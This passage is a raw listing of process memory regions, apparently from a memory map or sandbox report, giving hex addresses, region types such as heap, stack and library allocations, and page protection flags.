page read and write
3174000
heap
page read and write
77E7000
heap
page read and write
64BB000
stack
page read and write
26B0000
trusted library allocation
page read and write
23AAA410000
direct allocation
page read and write
31D0000
trusted library allocation
page read and write
31AE000
trusted library allocation
page read and write
23AD8E35000
unkown
page read and write
34B0000
trusted library allocation
page read and write
5560000
trusted library allocation
page read and write
181414E0000
heap
page read and write
3533000
trusted library allocation
page read and write
297D000
trusted library allocation
page read and write
315D000
trusted library allocation
page read and write
10AD000
unkown
page execute read
36B9000
trusted library allocation
page read and write
1200000
trusted library allocation
page read and write
34C6000
trusted library allocation
page read and write
3708000
trusted library allocation
page read and write
7BAB000
heap
page read and write
6DB000
heap
page read and write
23AD8E2F000
unkown
page read and write
AC0000
trusted library allocation
page read and write
69A000
heap
page read and write
23AD8B22000
trusted library allocation
page read and write
3224000
heap
page read and write
23AD82BB000
heap
page read and write
2A52000
trusted library allocation
page read and write
26E4000
trusted library allocation
page read and write
2AE1000
trusted library allocation
page read and write
18170DAF000
heap
page read and write
755E000
stack
page read and write
35C3000
trusted library allocation
page read and write
3174000
heap
page read and write
26E7000
trusted library allocation
page read and write
4FF000
unkown
page readonly
487000
unkown
page readonly
297B000
trusted library allocation
page read and write
1616000
trusted library allocation
page execute and read and write
3298000
trusted library allocation
page read and write
533000
unkown
page readonly
5520000
trusted library allocation
page read and write
E66000
unkown
page execute read
1814306C000
direct allocation
page read and write
671A000
heap
page read and write
367A000
trusted library allocation
page read and write
54A000
unkown
page readonly
3FF1000
trusted library allocation
page read and write
18143023000
direct allocation
page read and write
23AD8ABF000
trusted library allocation
page read and write
10EA000
trusted library allocation
page execute and read and write
27BB000
trusted library allocation
page read and write
5660000
unkown
page read and write
5AD5000
heap
page read and write
2B14000
trusted library allocation
page read and write
34DD000
trusted library allocation
page read and write
32AA000
trusted library allocation
page read and write
781E000
heap
page read and write
3220000
heap
page read and write
498000
unkown
page readonly
3108000
trusted library allocation
page read and write
181414E0000
heap
page read and write
57EE000
stack
page read and write
DAB000
unkown
page execute read
2420000
trusted library allocation
page read and write
3430000
trusted library allocation
page read and write
11E0000
heap
page read and write
120B000
trusted library allocation
page execute and read and write
453000
unkown
page readonly
23AD8E07000
unkown
page read and write
2969000
trusted library allocation
page read and write
36EB000
trusted library allocation
page read and write
23AAA378000
direct allocation
page read and write
27EF000
trusted library allocation
page read and write
1500000
heap
page execute and read and write
EF8000
unkown
page execute read
2AF9000
trusted library allocation
page read and write
23AD8D71000
trusted library allocation
page read and write
79C0000
heap
page read and write
514D000
stack
page read and write
3787000
trusted library allocation
page read and write
23AD8A00000
trusted library allocation
page read and write
D61000
unkown
page execute read
3660000
trusted library allocation
page read and write
313B000
trusted library allocation
page read and write
2A04000
trusted library allocation
page read and write
355D000
trusted library allocation
page read and write
620000
heap
page read and write
1620000
trusted library allocation
page read and write
33F7000
heap
page read and write
2AEF000
trusted library allocation
page read and write
1373000
unkown
page read and write
EF7D9FD000
stack
page read and write
23AD8A08000
trusted library allocation
page read and write
F40000
unkown
page execute read
4EE8000
trusted library allocation
page read and write
3789000
trusted library allocation
page read and write
328B000
trusted library allocation
page read and write
11F1000
unkown
page read and write
148A000
heap
page read and write
2440000
trusted library allocation
page read and write
23AA9B4E000
direct allocation
page read and write
136F000
unkown
page write copy
343A000
trusted library allocation
page read and write
319D000
trusted library allocation
page read and write
3546000
trusted library allocation
page read and write
50B000
unkown
page readonly
549D000
direct allocation
page read and write
3174000
heap
page read and write
26A6000
trusted library allocation
page read and write
3672000
trusted library allocation
page read and write
704FD000
unkown
page read and write
2783000
trusted library allocation
page read and write
23AA9B98000
direct allocation
page read and write
18141502000
heap
page read and write
2AA1000
trusted library allocation
page read and write
54D0000
trusted library allocation
page read and write
23AD8A26000
trusted library allocation
page read and write
66A0000
heap
page read and write
566E000
stack
page read and write
272E000
trusted library allocation
page read and write
4DD000
unkown
page readonly
689000
heap
page read and write
23AD8DAC000
unkown
page read and write
18143048000
direct allocation
page read and write
33ED000
trusted library allocation
page read and write
26F9000
trusted library allocation
page read and write
3174000
heap
page read and write
13BF000
unkown
page read and write
F00000
unkown
page readonly
3224000
heap
page read and write
23AD8A2E000
trusted library allocation
page read and write
348A000
trusted library allocation
page read and write
507E000
stack
page read and write
669E000
stack
page read and write
23AD8C0A000
unkown
page read and write
13B1000
unkown
page read and write
1814302C000
direct allocation
page read and write
23AD8A1F000
trusted library allocation
page read and write
23AD8C92000
trusted library allocation
page read and write
1383000
unkown
page read and write
5867000
heap
page read and write
23AD8DEB000
unkown
page read and write
23AD8CED000
trusted library allocation
page read and write
687000
heap
page read and write
3150000
direct allocation
page read and write
3561000
trusted library allocation
page read and write
1156000
unkown
page execute read
33E7000
trusted library allocation
page read and write
AA4000
trusted library allocation
page read and write
2825000
trusted library allocation
page read and write
23AA8158000
heap
page read and write
382B000
trusted library allocation
page read and write
23AD8C53000
trusted library allocation
page read and write
23AAA958000
heap
page read and write
E3A000
stack
page read and write
E51000
unkown
page execute read
1627000
trusted library allocation
page execute and read and write
3174000
heap
page read and write
33B7000
trusted library allocation
page read and write
23AD82D2000
heap
page read and write
125E000
stack
page read and write
6CE0000
trusted library allocation
page read and write
3725000
trusted library allocation
page read and write
30AC000
trusted library allocation
page read and write
5661000
unkown
page read and write
45F000
unkown
page readonly
23AAA960000
heap
page read and write
314E000
stack
page read and write
1724000
trusted library allocation
page read and write
7CFF000
stack
page read and write
1659000
unkown
page readonly
301D000
trusted library allocation
page read and write
2E9D000
stack
page read and write
6AF000
heap
page read and write
27BF000
trusted library allocation
page read and write
32A6000
trusted library allocation
page read and write
120B000
unkown
page write copy
26F5000
trusted library allocation
page read and write
848E000
stack
page read and write
148E000
stack
page read and write
3770000
trusted library allocation
page read and write
18143081000
direct allocation
page read and write
23AD8A3D000
trusted library allocation
page read and write
354A000
trusted library allocation
page read and write
59B0000
trusted library allocation
page execute and read and write
371D000
trusted library allocation
page read and write
2A06000
trusted library allocation
page read and write
23AD8A89000
trusted library allocation
page read and write
2897000
trusted library allocation
page read and write
11B3000
unkown
page read and write
E61000
unkown
page execute read
32C5000
trusted library allocation
page read and write
104E000
stack
page read and write
476000
unkown
page readonly
26C7000
trusted library allocation
page read and write
31CB000
trusted library allocation
page read and write
5060000
trusted library allocation
page read and write
36D8000
trusted library allocation
page read and write
6D02000
trusted library allocation
page read and write
2728000
trusted library allocation
page read and write
634F000
stack
page read and write
29AD000
trusted library allocation
page read and write
EF7DAFE000
stack
page read and write
23AAA371000
direct allocation
page read and write
2747000
trusted library allocation
page read and write
1612000
trusted library allocation
page read and write
274D000
trusted library allocation
page read and write
704FF000
unkown
page readonly
23AAA954000
heap
page read and write
365D000
trusted library allocation
page read and write
110B000
unkown
page execute read
23AD8D2C000
trusted library allocation
page read and write
2695000
trusted library allocation
page read and write
3174000
heap
page read and write
F0A000
unkown
page execute read
7AE06FD000
stack
page read and write
2A54000
trusted library allocation
page read and write
11BA000
unkown
page read and write
11FF000
unkown
page write copy
8170000
trusted library allocation
page execute and read and write
23AD7A86000
heap
page read and write
1609000
trusted library allocation
page read and write
12D0000
unkown
page execute read
4B63000
heap
page read and write
2B72000
trusted library allocation
page read and write
3295000
trusted library allocation
page read and write
181414F8000
heap
page read and write
18143D55000
heap
page read and write
7B96000
heap
page read and write
3691000
trusted library allocation
page read and write
D49E000
stack
page read and write
7D3E000
stack
page read and write
48D000
unkown
page readonly
2DEE000
stack
page read and write
2766000
trusted library allocation
page read and write
3396000
trusted library allocation
page read and write
23AD8ACE000
trusted library allocation
page read and write
23AAC8A1000
heap
page read and write
181414A0000
heap
page read and write
18171E71000
unkown
page read and write
23AD8AF4000
trusted library allocation
page read and write
35B0000
trusted library allocation
page read and write
68B000
heap
page read and write
18142FFE000
direct allocation
page read and write
28B8000
trusted library allocation
page read and write
1050000
heap
page read and write
6A4000
heap
page read and write
34C0000
trusted library allocation
page read and write
33F0000
heap
page read and write
1116000
unkown
page execute read
27F3000
trusted library allocation
page read and write
14D0000
trusted library allocation
page read and write
566000
unkown
page readonly
DFF000
unkown
page execute read
3174000
heap
page read and write
4A1D000
trusted library allocation
page read and write
33C8000
trusted library allocation
page read and write
181437A1000
direct allocation
page read and write
33D0000
direct allocation
page read and write
DBAE000
stack
page read and write
36F5000
trusted library allocation
page read and write
3174000
heap
page read and write
23AA9B5D000
direct allocation
page read and write
2AF3000
trusted library allocation
page read and write
23AAA210000
direct allocation
page read and write
51B0000
heap
page read and write
272A000
trusted library allocation
page read and write
13F4000
trusted library allocation
page read and write
13FD000
trusted library allocation
page execute and read and write
52D000
unkown
page readonly
23AD8DE5000
unkown
page read and write
3124000
trusted library allocation
page read and write
337B000
trusted library allocation
page read and write
31D8000
trusted library allocation
page read and write
30C9000
trusted library allocation
page read and write
801E000
stack
page read and write
7CBE000
stack
page read and write
3385000
trusted library allocation
page read and write
7AD0000
trusted library section
page read and write
37C8000
trusted library allocation
page read and write
10E0000
trusted library allocation
page read and write
2A6D000
trusted library allocation
page read and write
505E000
stack
page read and write
DC7000
unkown
page execute read
6A7000
heap
page read and write
341D000
trusted library allocation
page read and write
181434F0000
heap
page read and write
F4B000
unkown
page execute read
23AA9FD3000
heap
page read and write
30CE000
trusted library allocation
page read and write
697000
heap
page read and write
27DE000
trusted library allocation
page read and write
181714E2000
heap
page read and write
3158000
trusted library allocation
page read and write
23AAA950000
heap
page read and write
363E000
trusted library allocation
page read and write
10C3000
unkown
page execute read
336C000
trusted library allocation
page read and write
1270000
heap
page read and write
1234000
unkown
page readonly
11DE000
unkown
page read and write
2E50000
trusted library allocation
page read and write
33C0000
heap
page read and write
2B27000
trusted library allocation
page read and write
3291000
trusted library allocation
page read and write
37A6000
trusted library allocation
page read and write
3402000
trusted library allocation
page read and write
56E0000
heap
page execute and read and write
2F3C000
trusted library allocation
page read and write
342E000
trusted library allocation
page read and write
2A73000
trusted library allocation
page read and write
277D000
trusted library allocation
page read and write
23AAC8CC000
heap
page read and write
33CC000
trusted library allocation
page read and write
67F000
heap
page read and write
5B1E000
stack
page read and write
55B000
unkown
page readonly
2B0A000
trusted library allocation
page read and write
583000
unkown
page readonly
E4D000
unkown
page execute read
69E000
heap
page read and write
27B7000
trusted library allocation
page read and write
EDD000
unkown
page execute read
32A2000
trusted library allocation
page read and write
171C000
trusted library allocation
page read and write
F01000
unkown
page execute read
23AD82D8000
heap
page read and write
2821000
trusted library allocation
page read and write
5D0000
heap
page read and write
2B0E000
trusted library allocation
page read and write
18143064000
direct allocation
page read and write
5499000
direct allocation
page read and write
18143780000
direct allocation
page read and write
70E0000
heap
page read and write
793D000
heap
page read and write
6587000
trusted library allocation
page read and write
650000
heap
page read and write
704E0000
unkown
page readonly
6590000
heap
page read and write
5B5D000
stack
page read and write
37A0000
trusted library allocation
page read and write
3174000
heap
page read and write
2AD6000
trusted library allocation
page read and write
68B000
heap
page read and write
15FF000
stack
page read and write
3174000
heap
page read and write
18143669000
direct allocation
page read and write
26A4000
trusted library allocation
page read and write
34AB000
trusted library allocation
page read and write
23AA8090000
heap
page read and write
1814154C000
heap
page read and write
A8F000
stack
page read and write
23AD8D56000
unkown
page read and write
23AD8C81000
trusted library allocation
page read and write
3224000
heap
page read and write
292E000
trusted library allocation
page read and write
6C0000
heap
page read and write
2762000
trusted library allocation
page read and write
372C000
trusted library allocation
page read and write
2AFC000
trusted library allocation
page read and write
23AD7C83000
heap
page read and write
23AD8276000
heap
page read and write
26C3000
trusted library allocation
page read and write
116D000
unkown
page execute read
23AD8D04000
trusted library allocation
page read and write
26DC000
trusted library allocation
page read and write
354C000
trusted library allocation
page read and write
2730000
trusted library allocation
page read and write
588F000
heap
page read and write
1116000
unkown
page execute read
7FF48F160000
direct allocation
page read and write
32CB000
trusted library allocation
page read and write
23AD8B0B000
trusted library allocation
page read and write
2A6F000
trusted library allocation
page read and write
71DD000
heap
page read and write
297F000
trusted library allocation
page read and write
1290000
heap
page read and write
32A4000
trusted library allocation
page read and write
14A0000
heap
page read and write
28B2000
trusted library allocation
page read and write
7B5000
heap
page read and write
5AB0000
trusted library allocation
page read and write
34A5000
trusted library allocation
page read and write
23AD8C86000
trusted library allocation
page read and write
13E0000
unkown
page read and write
3488000
trusted library allocation
page read and write
679000
heap
page read and write
27F1000
trusted library allocation
page read and write
59C0000
trusted library allocation
page read and write
35A6000
trusted library allocation
page read and write
23AD8D95000
unkown
page read and write
2749000
trusted library allocation
page read and write
4C80000
heap
page execute and read and write
3810000
trusted library allocation
page read and write
1389000
unkown
page read and write
16DC000
trusted library allocation
page read and write
6AF000
heap
page read and write
3224000
heap
page read and write
3175000
trusted library allocation
page read and write
3174000
heap
page read and write
1730000
heap
page read and write
16B0000
trusted library allocation
page read and write
30C3000
trusted library allocation
page read and write
7AE05FE000
stack
page read and write
2683000
trusted library allocation
page read and write
1814303D000
direct allocation
page read and write
5A0E000
stack
page read and write
35B2000
trusted library allocation
page read and write
13BA000
unkown
page read and write
373A000
trusted library allocation
page read and write
1142000
unkown
page execute read
54D4000
trusted library allocation
page read and write
3174000
heap
page read and write
AD2000
trusted library allocation
page read and write
14DC000
trusted library allocation
page read and write
3163000
trusted library allocation
page read and write
D80000
unkown
page execute read
32BF000
trusted library allocation
page read and write
3360000
trusted library allocation
page read and write
11C8000
unkown
page write copy
3224000
heap
page read and write
27C3000
trusted library allocation
page read and write
640000
heap
page read and write
294D000
trusted library allocation
page read and write
35F5000
trusted library allocation
page read and write
23AD8AA8000
trusted library allocation
page read and write
827F000
stack
page read and write
18170F0C000
heap
page read and write
28B0000
trusted library allocation
page read and write
16D4000
trusted library allocation
page read and write
34DB000
trusted library allocation
page read and write
51A0000
trusted library section
page readonly
3130000
trusted library allocation
page read and write
18143005000
direct allocation
page read and write
4A9000
unkown
page readonly
CFE000
stack
page read and write
2996000
trusted library allocation
page read and write
2A1B000
trusted library allocation
page read and write
28F7000
trusted library allocation
page read and write
16F6000
trusted library allocation
page read and write
48DF000
stack
page read and write
4A0E000
trusted library allocation
page read and write
33FC000
heap
page read and write
46AC000
stack
page read and write
3529000
trusted library allocation
page read and write
3141000
trusted library allocation
page read and write
181710F6000
heap
page read and write
2DF0000
heap
page read and write
3174000
heap
page read and write
5821000
unkown
page read and write
23AD8A5C000
trusted library allocation
page read and write
760000
heap
page read and write
27F7000
trusted library allocation
page read and write
DE8000
unkown
page execute read
1814304F000
direct allocation
page read and write
11C9000
unkown
page read and write
33AF000
trusted library allocation
page read and write
366E000
trusted library allocation
page read and write
6A2000
heap
page read and write
12C8000
heap
page read and write
5C4F000
heap
page read and write
2779000
trusted library allocation
page read and write
11FF000
unkown
page read and write
3600000
heap
page read and write
7AE02FE000
stack
page read and write
2DA0000
heap
page read and write
23AD8D84000
unkown
page read and write
7A1D000
heap
page read and write
2A90000
trusted library allocation
page read and write
750000
heap
page readonly
382D000
trusted library allocation
page read and write
181414EE000
heap
page read and write
58AE000
stack
page read and write
18143640000
direct allocation
page read and write
13F4000
unkown
page readonly
29FC000
trusted library allocation
page read and write
277B000
trusted library allocation
page read and write
32CE000
stack
page read and write
26E2000
trusted library allocation
page read and write
2808000
trusted library allocation
page read and write
30A0000
trusted library allocation
page read and write
5C36000
heap
page read and write
275C000
trusted library allocation
page read and write
586E000
stack
page read and write
23AAA257000
direct allocation
page read and write
1163000
unkown
page execute read
2A88000
trusted library allocation
page read and write
23AD8C8C000
trusted library allocation
page read and write
3676000
trusted library allocation
page read and write
11FD000
unkown
page write copy
23AA9B8D000
direct allocation
page read and write
23AD8282000
heap
page read and write
162B000
trusted library allocation
page execute and read and write
572000
unkown
page readonly
32EC000
heap
page read and write
5720000
unkown
page read and write
318C000
trusted library allocation
page read and write
5180000
trusted library allocation
page execute and read and write
23AD82C3000
heap
page read and write
7650000
trusted library allocation
page execute and read and write
2745000
trusted library allocation
page read and write
2781000
trusted library allocation
page read and write
4019000
trusted library allocation
page read and write
16D6000
trusted library allocation
page read and write
10C4000
trusted library allocation
page read and write
28BD000
trusted library allocation
page read and write
4C6000
unkown
page readonly
4EE000
unkown
page readonly
3657000
trusted library allocation
page read and write
23AD8232000
heap
page read and write
18141490000
heap
page read and write
3706000
trusted library allocation
page read and write
3191000
trusted library allocation
page read and write
16A0000
heap
page read and write
23AD8B2A000
trusted library allocation
page read and write
EF8000
stack
page read and write
23AAA217000
direct allocation
page read and write
2A8E000
trusted library allocation
page read and write
23AD8CC5000
trusted library allocation
page read and write
2B42000
trusted library allocation
page read and write
5C1B000
heap
page read and write
67A000
heap
page read and write
4A40000
trusted library allocation
page read and write
23AD8C75000
trusted library allocation
page read and write
3119000
trusted library allocation
page read and write
644E000
stack
page read and write
33FA000
trusted library allocation
page read and write
B7B000
stack
page read and write
23AD8972000
trusted library allocation
page read and write
365B000
trusted library allocation
page read and write
4CCE000
stack
page read and write
10F7000
unkown
page execute read
485F000
stack
page read and write
3744000
trusted library allocation
page read and write
2769000
trusted library allocation
page read and write
23AD8DF6000
unkown
page read and write
5A10000
heap
page read and write
4DCF000
stack
page read and write
18170EF0000
heap
page read and write
23AD8A6B000
trusted library allocation
page read and write
1069000
unkown
page execute read
13F0000
unkown
page read and write
23AA80E2000
heap
page read and write
7D40000
trusted library allocation
page read and write
23AD8CD1000
trusted library allocation
page read and write
462F000
stack
page read and write
3612000
trusted library allocation
page read and write
635D000
stack
page read and write
3548000
trusted library allocation
page read and write
23AD8E02000
unkown
page read and write
3174000
heap
page read and write
40F9000
trusted library allocation
page read and write
5661000
unkown
page read and write
23AD8A73000
trusted library allocation
page read and write
27DC000
trusted library allocation
page read and write
3293000
trusted library allocation
page read and write
23AD8C00000
unkown
page read and write
40AE000
trusted library allocation
page read and write
1270000
heap
page read and write
78A0000
heap
page read and write
625D000
stack
page read and write
66C6000
heap
page read and write
3616000
trusted library allocation
page read and write
481B000
stack
page read and write
555000
unkown
page readonly
465000
unkown
page readonly
339C000
trusted library allocation
page read and write
5C0E000
stack
page read and write
29D1000
trusted library allocation
page read and write
53D9000
direct allocation
page read and write
52B0000
direct allocation
page read and write
1814307A000
direct allocation
page read and write
18143647000
direct allocation
page read and write
23AD8E3B000
unkown
page read and write
23AA9B8B000
direct allocation
page read and write
3174000
heap
page read and write
23AD8D27000
trusted library allocation
page read and write
36A2000
trusted library allocation
page read and write
23AD82B0000
heap
page read and write
23AD8C47000
trusted library allocation
page read and write
26F3000
trusted library allocation
page read and write
35FB000
trusted library allocation
page read and write
704E1000
unkown
page execute read
1222000
unkown
page read and write
815E000
stack
page read and write
49F0000
trusted library allocation
page read and write
ECF000
unkown
page execute read
37AC000
trusted library allocation
page read and write
DD7000
unkown
page execute read
C7E000
unkown
page read and write
23AAA232000
direct allocation
page read and write
4D1000
unkown
page readonly
FBA000
unkown
page execute read
576B000
unkown
page read and write
2A8A000
trusted library allocation
page read and write
7A9E000
heap
page read and write
13F0000
trusted library allocation
page read and write
23AA9B83000
direct allocation
page read and write
2A58000
trusted library allocation
page read and write
3387000
trusted library allocation
page read and write
2EB0000
trusted library allocation
page read and write
5BF0000
heap
page read and write
AC2000
trusted library allocation
page read and write
77A0000
heap
page read and write
23AD8C4D000
trusted library allocation
page read and write
368D000
trusted library allocation
page read and write
23AA80AA000
heap
page read and write
23AD8D54000
trusted library allocation
page read and write
5821000
unkown
page read and write
33CE000
trusted library allocation
page read and write
3174000
heap
page read and write
79F5000
heap
page read and write
112D000
unkown
page execute read
14CD000
stack
page read and write
27D4000
trusted library allocation
page read and write
7B73000
heap
page read and write
3174000
heap
page read and write
23AA80D1000
heap
page read and write
3540000
heap
page read and write
2AB8000
trusted library allocation
page read and write
11D6000
unkown
page read and write
13CB000
unkown
page read and write
3812000
trusted library allocation
page read and write
2A6B000
trusted library allocation
page read and write
3518000
trusted library allocation
page read and write
33BC000
trusted library allocation
page read and write
1814153E000
heap
page read and write
23AA9AA0000
direct allocation
page read and write
472F000
stack
page read and write
357A000
trusted library allocation
page read and write
3670000
trusted library allocation
page read and write
BC0000
trusted library allocation
page read and write
1210000
heap
page read and write
1814364B000
direct allocation
page read and write
FEB000
unkown
page execute read
34BE000
trusted library allocation
page read and write
3423000
trusted library allocation
page read and write
23AD8CE8000
trusted library allocation
page read and write
23AD8271000
heap
page read and write
344B000
trusted library allocation
page read and write
12B0000
heap
page read and write
3174000
heap
page read and write
23AA9BBC000
direct allocation
page read and write
5BA0000
unkown
page read and write
5000000
trusted library allocation
page read and write
79C7000
heap
page read and write
3618000
trusted library allocation
page read and write
114D000
unkown
page execute read
328F000
trusted library allocation
page read and write
3174000
heap
page read and write
3169000
trusted library allocation
page read and write
10C3000
trusted library allocation
page execute and read and write
3174000
heap
page read and write
2990000
trusted library allocation
page read and write
37DA000
trusted library allocation
page read and write
ADB000
trusted library allocation
page execute and read and write
2A9F000
trusted library allocation
page read and write
341F000
trusted library allocation
page read and write
119E000
unkown
page execute read
3224000
heap
page read and write
FDF000
unkown
page execute read
518D000
stack
page read and write
1726000
trusted library allocation
page read and write
121C000
unkown
page read and write
23AD8D10000
trusted library allocation
page read and write
7B0000
heap
page read and write
ED1000
unkown
page execute read
23AAA390000
direct allocation
page read and write
33B5000
trusted library allocation
page read and write
56AE000
stack
page read and write
3174000
heap
page read and write
3516000
trusted library allocation
page read and write
5AD0000
heap
page read and write
65A000
heap
page read and write
23AAA368000
direct allocation
page read and write
F77000
unkown
page execute read
30F6000
trusted library allocation
page read and write
23AA9F40000
heap
page read and write
2ADE000
trusted library allocation
page read and write
5C50000
trusted library allocation
page execute and read and write
6B6000
heap
page read and write
23AD8986000
trusted library allocation
page read and write
3408000
trusted library allocation
page read and write
33CA000
trusted library allocation
page read and write
3421000
trusted library allocation
page read and write
FC1000
unkown
page execute read
3514000
trusted library allocation
page read and write
10CD000
trusted library allocation
page execute and read and write
76B0000
trusted library section
page read and write
355F000
trusted library allocation
page read and write
F54000
unkown
page execute read
352B000
trusted library allocation
page read and write
3EE1000
trusted library allocation
page read and write
3EE8000
trusted library allocation
page read and write
2717000
trusted library allocation
page read and write
7AE03FE000
stack
page read and write
1280000
trusted library allocation
page execute and read and write
23AD8D43000
trusted library allocation
page read and write
1209000
unkown
page write copy
501D000
heap
page read and write
3180000
trusted library allocation
page read and write
789D000
heap
page read and write
16C0000
trusted library allocation
page read and write
3451000
trusted library allocation
page read and write
1640000
trusted library allocation
page read and write
30E5000
trusted library allocation
page read and write
3540000
trusted library allocation
page read and write
18142FF0000
direct allocation
page read and write
3174000
heap
page read and write
181437B8000
direct allocation
page read and write
350E000
trusted library allocation
page read and write
181434F3000
heap
page read and write
23AA9B47000
direct allocation
page read and write
33EB000
trusted library allocation
page read and write
D85000
unkown
page execute read
18142F57000
direct allocation
page read and write
23AA9AB5000
direct allocation
page read and write
3224000
heap
page read and write
1210000
unkown
page write copy
343C000
trusted library allocation
page read and write
7B00000
heap
page read and write
2A86000
trusted library allocation
page read and write
7FF48F100000
direct allocation
page read and write
6BF000
heap
page read and write
337F000
stack
page read and write
3174000
heap
page read and write
11C3000
unkown
page read and write
527000
unkown
page readonly
23AA9AAE000
direct allocation
page read and write
5661000
unkown
page read and write
5661000
unkown
page read and write
11B6000
unkown
page read and write
AA0000
trusted library allocation
page read and write
2E4E000
stack
page read and write
39B000
stack
page read and write
3174000
heap
page read and write
37DF000
trusted library allocation
page read and write
5AA0000
trusted library allocation
page read and write
2928000
trusted library allocation
page read and write
76D0000
trusted library section
page read and write
DCAD000
stack
page read and write
28D3000
trusted library allocation
page read and write
2810000
trusted library allocation
page read and write
14F0000
trusted library allocation
page read and write
10E7000
unkown
page execute read
18141700000
heap
page read and write
AA3000
trusted library allocation
page execute and read and write
2A1D000
trusted library allocation
page read and write
1094000
unkown
page execute read
3174000
heap
page read and write
704F6000
unkown
page readonly
F0F000
unkown
page execute read
1227000
unkown
page read and write
23AD8ADD000
trusted library allocation
page read and write
7E40000
trusted library allocation
page read and write
36F8000
trusted library allocation
page read and write
5190000
trusted library allocation
page read and write
5ADE000
stack
page read and write
16F1000
trusted library allocation
page read and write
410000
unkown
page readonly
23AA9BA6000
direct allocation
page read and write
27B9000
trusted library allocation
page read and write
18143662000
direct allocation
page read and write
35E4000
trusted library allocation
page read and write
27BD000
trusted library allocation
page read and write
D61E000
stack
page read and write
538000
unkown
page readonly
33E0000
unkown
page read and write
1230000
unkown
page read and write
5150000
trusted library allocation
page read and write
2AD8000
trusted library allocation
page read and write
139E000
unkown
page read and write
A90000
trusted library allocation
page read and write
3419000
trusted library allocation
page read and write
23AD7B8E000
heap
page read and write
66D9000
heap
page read and write
65A000
heap
page read and write
481000
unkown
page readonly
32A8000
trusted library allocation
page read and write
980000
heap
page read and write
23AD8C9D000
trusted library allocation
page read and write
139B000
unkown
page read and write
23AD8D0A000
trusted library allocation
page read and write
23AA9F60000
direct allocation
page execute and read and write
29E5000
trusted library allocation
page read and write
11B1000
unkown
page write copy
18170FF6000
heap
page read and write
EB9000
unkown
page execute read
3492000
trusted library allocation
page read and write
1436000
heap
page read and write
3825000
trusted library allocation
page read and write
18171571000
heap
page read and write
2A3F000
trusted library allocation
page read and write
2B2D000
trusted library allocation
page read and write
30A6000
trusted library allocation
page read and write
544000
unkown
page readonly
1298000
heap
page read and write
29F8000
trusted library allocation
page read and write
47DE000
stack
page read and write
3332000
trusted library allocation
page read and write
5C27000
heap
page read and write
181414FA000
heap
page read and write
3678000
trusted library allocation
page read and write
5573000
heap
page read and write
23AD8A45000
trusted library allocation
page read and write
2935000
trusted library allocation
page read and write
2693000
trusted library allocation
page read and write
3640000
trusted library allocation
page read and write
23AA9BB4000
direct allocation
page read and write
2ADA000
trusted library allocation
page read and write
2EC0000
trusted library allocation
page read and write
5730000
trusted library allocation
page read and write
336A000
trusted library allocation
page read and write
34BC000
trusted library allocation
page read and write
66B0000
heap
page read and write
64C0000
trusted library section
page readonly
23AD8C52000
unkown
page read and write
23AAA388000
direct allocation
page read and write
27FC000
trusted library allocation
page read and write
6B1000
heap
page read and write
72DE000
stack
page read and write
311E000
trusted library allocation
page read and write
66EA000
heap
page read and write
DC3000
unkown
page execute read
684000
heap
page read and write
2F0C000
trusted library allocation
page read and write
37BF000
trusted library allocation
page read and write
23AD81F3000
heap
page read and write
1207000
unkown
page write copy
115E000
unkown
page execute read
3525000
trusted library allocation
page read and write
5010000
heap
page read and write
7AE04FD000
stack
page read and write
1131000
unkown
page execute read
3174000
heap
page read and write
23AD8C97000
trusted library allocation
page read and write
D41000
unkown
page execute read
36EF000
trusted library allocation
page read and write
13C0000
heap
page read and write
2A02000
trusted library allocation
page read and write
7A63000
heap
page read and write
10B0000
trusted library allocation
page read and write
4F9000
unkown
page readonly
3712000
trusted library allocation
page read and write
23AD8800000
trusted library allocation
page read and write
23AD8CB4000
trusted library allocation
page read and write
830E000
stack
page read and write
4F10000
heap
page read and write
357C000
trusted library allocation
page read and write
23AD8CBA000
trusted library allocation
page read and write
31BF000
trusted library allocation
page read and write
35CE000
trusted library allocation
page read and write
136F000
unkown
page read and write
5BDE000
stack
page read and write
54F6000
trusted library allocation
page read and write
2B70000
trusted library allocation
page read and write
13EC000
unkown
page read and write
2932000
trusted library allocation
page read and write
23AD8E41000
unkown
page read and write
351F000
stack
page read and write
11FD000
unkown
page read and write
33B9000
trusted library allocation
page read and write
37AA000
trusted library allocation
page read and write
35C1000
trusted library allocation
page read and write
105C000
unkown
page execute read
715E000
heap
page read and write
23AD8DDF000
unkown
page read and write
23AD8B1D000
trusted library allocation
page read and write
D58000
unkown
page execute read
795000
heap
page read and write
13DC000
unkown
page read and write
7EDE000
stack
page read and write
57CE000
stack
page read and write
292A000
trusted library allocation
page read and write
33E9000
trusted library allocation
page read and write
26CB000
trusted library allocation
page read and write
1814153E000
heap
page read and write
3406000
trusted library allocation
page read and write
3563000
trusted library allocation
page read and write
1814153E000
heap
page read and write
18172203000
unkown
page read and write
354E000
trusted library allocation
page read and write
50EC000
heap
page read and write
289B000
trusted library allocation
page read and write
23AD825A000
heap
page read and write
6C1000
heap
page read and write
23AD8A7A000
trusted library allocation
page read and write
2895000
trusted library allocation
page read and write
1710000
trusted library allocation
page read and write
580D000
stack
page read and write
4F4000
unkown
page readonly
26D0000
trusted library allocation
page read and write
F03000
unkown
page execute read
380A000
trusted library allocation
page read and write
1220000
unkown
page read and write
23AD8CDC000
trusted library allocation
page read and write
36DA000
trusted library allocation
page read and write
54EE000
trusted library allocation
page read and write
13EB000
unkown
page write copy
35F7000
trusted library allocation
page read and write
4A50000
trusted library allocation
page execute and read and write
337D000
trusted library allocation
page read and write
5661000
unkown
page read and write
704FD000
unkown
page read and write
36E9000
trusted library allocation
page read and write
23AD82A4000
heap
page read and write
2697000
trusted library allocation
page read and write
2439000
trusted library allocation
page read and write
7600000
trusted library allocation
page read and write
274B000
trusted library allocation
page read and write
181414A9000
heap
page read and write
1100000
heap
page read and write
5820000
heap
page read and write
3565000
trusted library allocation
page read and write
23AAA197000
direct allocation
page read and write
3490000
trusted library allocation
page read and write
27FA000
trusted library allocation
page read and write
29CC000
trusted library allocation
page read and write
11F2000
unkown
page write copy
2B46000
trusted library allocation
page read and write
3614000
trusted library allocation
page read and write
3224000
heap
page read and write
13E0000
trusted library allocation
page read and write
1510000
trusted library allocation
page read and write
69A000
heap
page read and write
3651000
trusted library allocation
page read and write
27E1000
trusted library allocation
page read and write
2964000
trusted library allocation
page read and write
12C5000
heap
page read and write
33E1000
unkown
page read and write
3174000
heap
page read and write
3174000
heap
page read and write
1054000
unkown
page execute read
2777000
trusted library allocation
page read and write
1202000
unkown
page write copy
35E0000
trusted library allocation
page read and write
2A00000
trusted library allocation
page read and write
382F000
trusted library allocation
page read and write
23AD8CA9000
trusted library allocation
page read and write
23AA9B40000
direct allocation
page read and write
2930000
